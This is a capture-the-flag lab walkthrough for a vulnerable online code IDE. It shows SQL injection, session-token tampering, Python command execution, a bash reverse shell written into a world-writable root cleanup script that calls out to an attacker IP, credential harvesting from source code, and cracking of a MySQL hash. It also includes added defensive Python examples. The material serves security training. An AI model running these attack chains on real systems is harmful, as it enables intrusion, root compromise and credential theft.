Walkthrough 2160
URL https://attackdefense.com/challengedetails?cid=2160
Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.
When the lab is launched, an Online Code IDE WebApp opens up in Firefox.
Launch BurpSuite:
Select Web Application Analysis > burpsuite from the application menu.
Once BurpSuite opens up, configure FoxyProxy to use the Burp Suite profile:
Use the following credentials to perform SQLi and log in to the webapp:
FLAG1: 2fb96bbc46ca18d07e0455acc706ea17
Session ID (sessid):
eyJhZG1pbiI6IDAsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIs
ICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9
Note: Do not forward the above response. It will be used in the next steps.
Command: echo eyJhZG1pbiI6IDAsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIsICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9 | base64 -d
FLAG2: fc235edfe919b80b4e87a7ef852f1f4f
Notice that there is an admin attribute in the decoded session and it is set to 0.
FLAG4: 7fa644c02146cd735a772199f6c9b050
Python Code:
print("Hello World!")
It must be because the Session ID was tampered with in the previous step (while setting the admin attribute to 1).
Step 6: Log out of the webapp and log back in using the same SQLi payload.
Click on the Logout button located on the top right of the webapp:
Python Code:
print("Hello World!")
Execute the above code.
Session ID:
eyJhZG1pbiI6IDAsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIs
ICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9
Decode the Session ID retrieved from the above request, set the admin attribute to true (anything other than 0 is treated as true) and encode it back:
Commands:
echo eyJhZG1pbiI6IDAsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIsICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9 | base64 -d
Since the backend is vulnerable to SQLi, try a union-based SQLi payload in the email field so that the backend itself sets the admin attribute (to anything other than 0):
Commands:
echo '{"admin": 1, "userid": 1, "email": "'"' union select 1,2,3" '#", "FLAG2": "fc235edfe919b80b4e87a7ef852f1f4f"}'
echo '{"admin": 1, "userid": 1, "email": "'"' union select 1,2,3" '#", "FLAG2": "fc235edfe919b80b4e87a7ef852f1f4f"}' | base64 -w0
Modified Session ID:
eyJhZG1pbiI6IDEsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiJyB1bmlvbiBzZWxlY3QgMSwyLDM
gIyIsICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9Cg==
The above Session ID didn't work! It must be because the number of columns on the left and right sides of the union keyword differ.
Modify the union-based SQLi payload and increase the number of columns on the right side of the union keyword:
Command: echo '{"admin": 1, "userid": 1, "email": "'"' union select 1,2,3,4" '#", "FLAG2": "fc235edfe919b80b4e87a7ef852f1f4f"}' | base64 -w0
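The column-count behaviour seen above, reproduced on a constructed in-memory SQLite table as an added example (not the lab's backend): the email field from the session is spliced into the query text, so a three-column union errors out while a four-column one returns a row whose admin column is non-zero. The parameterised version beside it treats the same value as data. The table layout, the function names and the use of SQLite's `--` comment in place of MySQL's `#` are assumptions for the demo.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the lab's user table: four columns, the count the walkthrough needed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userid INTEGER, email TEXT, admin INTEGER, flag TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'jackie@code-ide.com', 0, 'constructed-flag-value')")
    return conn

def lookup_concat(conn: sqlite3.Connection, email: str):
    """Vulnerable: the session's email value becomes part of the SQL text (how the lab's backend behaves)."""
    sql = "SELECT userid, email, admin, flag FROM users WHERE email = '" + email + "'"
    return conn.execute(sql).fetchone()

def lookup_param(conn: sqlite3.Connection, email: str):
    """Hardened: the same query with a bound parameter; the value is never parsed as SQL."""
    sql = "SELECT userid, email, admin, flag FROM users WHERE email = ?"
    return conn.execute(sql, (email,)).fetchone()

# The two injected email values from the walkthrough, with SQLite's line comment instead of '#'.
THREE_COLS = "' union select 1,2,3 -- "
FOUR_COLS = "' union select 1,2,3,4 -- "

def concat_outcome(conn: sqlite3.Connection, email: str) -> str:
    """What the concatenated query does with a value: 'row', 'none', or 'error:<database message>'."""
    try:
        row = lookup_concat(conn, email)
    except sqlite3.OperationalError as exc:
        return "error:" + str(exc)
    return "row" if row else "none"

if __name__ == "__main__":
    db = make_db()
    for value in (THREE_COLS, FOUR_COLS):
        print(repr(value), "concat ->", concat_outcome(db, value), "| param ->", lookup_param(db, value))
```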
FLAG3: 9448a9de8df7ef9473c3d82729bff89b
Note: Turn off the Intercept Mode in BurpSuite for all future requests.
Notice the response in the webapp as well (after the interception is turned off in BurpSuite).
Python Code:
import os
os.system("ls -al")
The above code uses the system function from the os module to run the command "ls -al".
Check the IP address of the host machine (the Kali attacker machine):
Start a netcat listener:
Code:
import os
Note: Make sure to replace the IP address with the one you get in your lab instance.
Run the code and notice the terminal running the netcat listener:
Command: printenv
FLAG5: 4787bf9ab0f4b5f60a19b577e4d1a486
Check the processes:
Command: ps aux
This script cleans up files that are older than 1 minute and owned by the codebot user (excluding the home directory files).
It is world-writable! This can be leveraged to gain a root shell on the target machine.
Modify the contents of the cleanup script to receive a shell session on the attacker machine:
Commands:
echo "bash -c 'bash -i >& /dev/tcp/192.183.31.2/8888 0>&1'" > /cleanup.sh
cat /cleanup.sh
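An added check, not part of the lab, for the condition that made this step possible: a script executed by a privileged job must not be writable by anyone else, and neither may its directory be replaceable. The function names and the constructed fixture (two copies of a placeholder cleanup script at modes 0777 and 0755 in a temporary directory) are assumptions for the demo.

```python
import os
import stat
import tempfile

def script_exposure(path: str) -> list:
    """List the ways a local, unprivileged user could change what a privileged job runs from `path`."""
    st = os.stat(path)
    issues = []
    if st.st_mode & stat.S_IWOTH:
        issues.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        issues.append("writable by a non-root group")
    if st.st_uid != 0:
        issues.append("not owned by root")
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        issues.append("parent directory world-writable without sticky bit (file can be replaced)")
    return issues

def demo() -> dict:
    """Constructed fixture: the same placeholder script at the lab's 0777 mode and at a sane 0755."""
    tmp = tempfile.mkdtemp()
    results = {}
    for name, mode in (("cleanup_0777.sh", 0o777), ("cleanup_0755.sh", 0o755)):
        path = os.path.join(tmp, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\n# constructed placeholder for the lab's cleanup script\n")
        os.chmod(path, mode)
        results[name] = script_exposure(path)
    return results

if __name__ == "__main__":
    for name, issues in demo().items():
        print(name, "->", issues or ["no writable-by-others exposure"])
```

On a real host the same function can be pointed at every script referenced from cron, systemd timers or root's shell history to find a cleanup.sh-style foothold before an attacker does.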
Command: whoami
Commands:
cat /home/admin/FLAG7
cat /root/FLAG10
FLAG7: 59b0dc3b11be41bd31e3e20823bc3a45
FLAG10: e8288b0cc0a442b58260b96f72609c9d
Command: ps aux
Notice that a MySQL server is running on the target machine, as seen in the above output.
Commands:
python -c "import pty;pty.spawn('/bin/bash')"
[Press CTRL + Z]
stty raw -echo
fg
Step 16: Look for MySQL credentials in the backend API code.
Commands:
ls
ls pythonAPI/
grep -r -C4 mysql pythonAPI/
Notice that the code (DBAPI.py) contains the credentials used to connect to the MySQL server:
Username: michael
Password: 5up3r_53cur3_p4ssw0rd
Step 17: Connect to the MySQL server using the credentials retrieved in the previous step.
Commands:
show databases;
use secret_flag_9686d1f73c3
show tables;
select * from flag;
FLAG9: 1f63300548823105d976aeb86a2ccdfe
Step 19: Retrieve the authentication string for the MySQL root user.
Use the following SQL query to get the username, host and authentication string of all the users
in the mysql.user table:
Save the authentication_string for the root user to a file (on the attacker machine, that is, the Kali GUI) and crack it using John the Ripper:
Commands:
echo '*6B5EDDE567F4F29018862811195DBD14B8ADDD2A' > hash.txt
john hash.txt
FLAG11 (Password of MySQL root user): 1234567890
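Why the root hash above falls to a wordlist in seconds, as an added example (not the lab's code): a `*` followed by 40 hex digits is the mysql_native_password format, an unsalted SHA1(SHA1(password)) with no cost factor. The block recomputes that format and uses it the way a defender would, to flag accounts whose stored hash matches a banned-password list; the function names and the constructed account table are assumptions.

```python
import hashlib

# The mysql.user authentication_string the walkthrough records for root (mysql_native_password format).
PAGE_ROOT_HASH = "*6B5EDDE567F4F29018862811195DBD14B8ADDD2A"

def mysql_native_hash(password: str) -> str:
    """mysql_native_password stores '*' + uppercase hex of SHA1(SHA1(password)). There is no salt
    and no work factor, so one pass over a wordlist tests every account's hash at once."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

def is_native_hash(auth_string: str) -> bool:
    return (len(auth_string) == 41 and auth_string.startswith("*")
            and all(c in "0123456789ABCDEF" for c in auth_string[1:]))

def banned_password_hits(accounts: dict, banned: list) -> dict:
    """Defensive audit: map each account whose stored hash equals the hash of a banned
    (known-weak) password to that password, so the account can be forced to rotate."""
    lookup = {mysql_native_hash(pw): pw for pw in banned}
    return {user: lookup[h] for user, h in accounts.items() if is_native_hash(h) and h in lookup}

if __name__ == "__main__":
    # Constructed account table: the root hash from the lab plus a hash built here for michael.
    accounts = {"root": PAGE_ROOT_HASH, "michael": mysql_native_hash("5up3r_53cur3_p4ssw0rd")}
    print(banned_password_hits(accounts, ["password", "1234567890", "admin"]))
```

Accounts still on mysql_native_password should be moved to caching_sha2_password, which is salted and iterated, and root should not be reachable with a password found in any wordlist.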